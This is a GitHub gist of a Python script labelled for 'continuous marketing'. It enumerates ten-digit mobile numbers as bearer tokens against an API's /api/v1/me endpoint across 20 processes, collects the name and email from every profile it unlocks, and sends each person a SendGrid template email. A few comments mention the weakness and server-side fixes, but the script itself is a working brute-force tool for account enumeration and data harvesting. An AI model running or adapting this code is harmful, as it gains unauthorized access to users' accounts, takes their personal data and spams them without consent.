@shalzz
Last active September 6, 2018 05:41
[Continuous Marketing] Python script to brute force an api for emails and send a template email via sendgrid #api #bruteforce
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Inspired by the brute-force basic HTTP auth script by zed.
See https://gist.github.com/zed/0a8860f4f9a824561b51
"""
from __future__ import print_function
import sys
import time
from base64 import b64encode
from itertools import repeat
from multiprocessing import Pool
from string import digits
from timeit import default_timer as timer
import json
import hashlib
from datetime import datetime
import sendgrid
import os
from sendgrid.helpers.mail import *
# SendGrid client shared by send_email(). The API key is read from the
# environment rather than stored in the file; it is None when
# SENDGRID_API_KEY is unset.
sg = sendgrid.SendGridAPIClient(apikey=os.getenv('SENDGRID_API_KEY'))

# HTTPSConnection lives in httplib on Python 2 and in http.client on Python 3.
try:
    from httplib import HTTPSConnection
except ImportError:
    from http.client import HTTPSConnection  # py3k

# Python 2 needs itertools.izip for a lazy zip; Python 3's builtin is lazy.
try:
    from itertools import izip as zip
except ImportError:  # py3k
    zip = zip
def gen_passwords():  # ~400K/s
    """Yield each integer in the half-open range [9000000000, 9999999999).

    main() feeds these values to mp_check(), which passes each one to
    check() as a bearer token. A credential space this small can be walked
    exhaustively, which is why an identifier of this form is not suitable
    as an API secret.
    """
    first, stop = 9000000000, 9999999999
    for candidate in range(first, stop):
        yield candidate
def report_error(*args):
    """Write ``error (<args tuple>)`` as a single line to standard error."""
    line = "error %s" % (args,)
    print(line, file=sys.stderr)
# Per-process HTTPS connection: created lazily by check() and reset to None
# by mp_check() after an error.
conn = None
def check(mobileno, nretries=3):  # ~1100/s
    """Send one GET /api/v1/me request using ``mobileno`` as the bearer token.

    The whole credential presented to the server is ``str(mobileno)``. An
    API that accepts a guessable identifier as a bearer token is what makes
    enumeration like this possible; unguessable tokens and rate limiting of
    repeated 401 responses are the server-side mitigations.

    Args:
        mobileno: value placed after ``Bearer `` in the Authorization header.
        nretries: remaining retries for undecodable bodies and for statuses
            other than 200 and 401.

    Returns:
        The decoded JSON body on HTTP 200. None on HTTP 401, and None once
        the retries are used up (after the failure is reported to stderr).
    """
    global conn  # one connection is reused per worker process
    if conn is None:
        conn = HTTPSConnection('localhost', 8080, timeout=10)

    auth_headers = {'Authorization': 'Bearer ' + str(mobileno)}
    conn.request('GET', '/api/v1/me', headers=auth_headers)
    response = conn.getresponse()
    try:
        # The body has to be read before the next request is sent on this
        # connection.
        payload = json.loads(response.read().decode())
    except ValueError:
        if nretries > 0:
            # Back off for 5/nretries**2 seconds, then retry.
            time.sleep(5. / nretries ** 2)
            return check(mobileno, nretries=nretries - 1)
        report_error((mobileno), "value error")
        # Execution continues below; `payload` is bound only when decoding
        # succeeded.

    status = response.status
    if status == 401:
        return
    if status == 200:
        print(payload)
        return payload
    if nretries > 0:
        time.sleep(5. / nretries ** 2)
        return check(mobileno, nretries=nretries - 1)
    report_error((mobileno), status)
def send_email(profile):
    """Send the SendGrid template e-mail to the address in ``profile``.

    Args:
        profile: mapping with ``"email"`` (the recipient) and ``"name"``
            (substituted for ``%name%`` in the template).

    Returns:
        None. The SendGrid response status code and body are printed.
    """
    # NOTE(review): the two address literals below look like the hosting
    # page's e-mail obfuscation placeholder, not real addresses.
    sender = Email("[email protected]")
    to_email = Email("[email protected]")  # only used by the disabled add_to below

    mail = Mail()
    mail.template_id = "263b3934-aa4b-40c7-9965-9e3c67628a1a"
    mail.from_email = sender

    recipient = Personalization()
    recipient.add_to(Email(profile["email"]))
    #person.add_to(to_email)
    recipient.add_substitution(Substitution('%name%', profile["name"]))
    mail.add_personalization(recipient)

    response = sg.client.mail.send.post(request_body=mail.get())
    print(response.status_code)
    print(response.body)
def mp_check(args):
    """Pool worker: run check() on one value and e-mail the profile it returns.

    Returns None when check() yields nothing or the profile has no e-mail;
    otherwise returns whatever send_email() returns. Any exception is
    reported to stderr with a traceback, and the per-process connection is
    closed and reset so the next call opens a fresh one.
    """
    global conn
    try:
        user = check(args)
        if user == None or user["email"] == None:
            return
        return send_email(user)
    except Exception as exc:
        report_error(args, exc)
        import traceback
        traceback.print_exc(file=sys.stderr)
        # Close the connection to prevent fd leaks; failures while closing
        # are deliberately ignored.
        try:
            conn.close()
        except:
            pass
        conn = None  # reset connection
def main():
    """Fan gen_passwords() out to 20 worker processes and print throughput.

    The loop stops at the first truthy result from mp_check(), which returns
    whatever send_email() returns. It then prints how many values were
    processed and the rate per second.
    """
    started = timer()
    workers = Pool(processes=20)
    results = workers.imap_unordered(mp_check, gen_passwords())
    for n, found in enumerate(results, 1):
        if found:
            print("found %s" % (found,))
            break
    elapsed = timer() - started
    print("Processed %d passwords in %.2f seconds (%.0f p/s)" % (n, elapsed, n / elapsed))
# Run only when executed as a script, not when imported (the Pool workers
# import this module).
if __name__ == "__main__":
    main()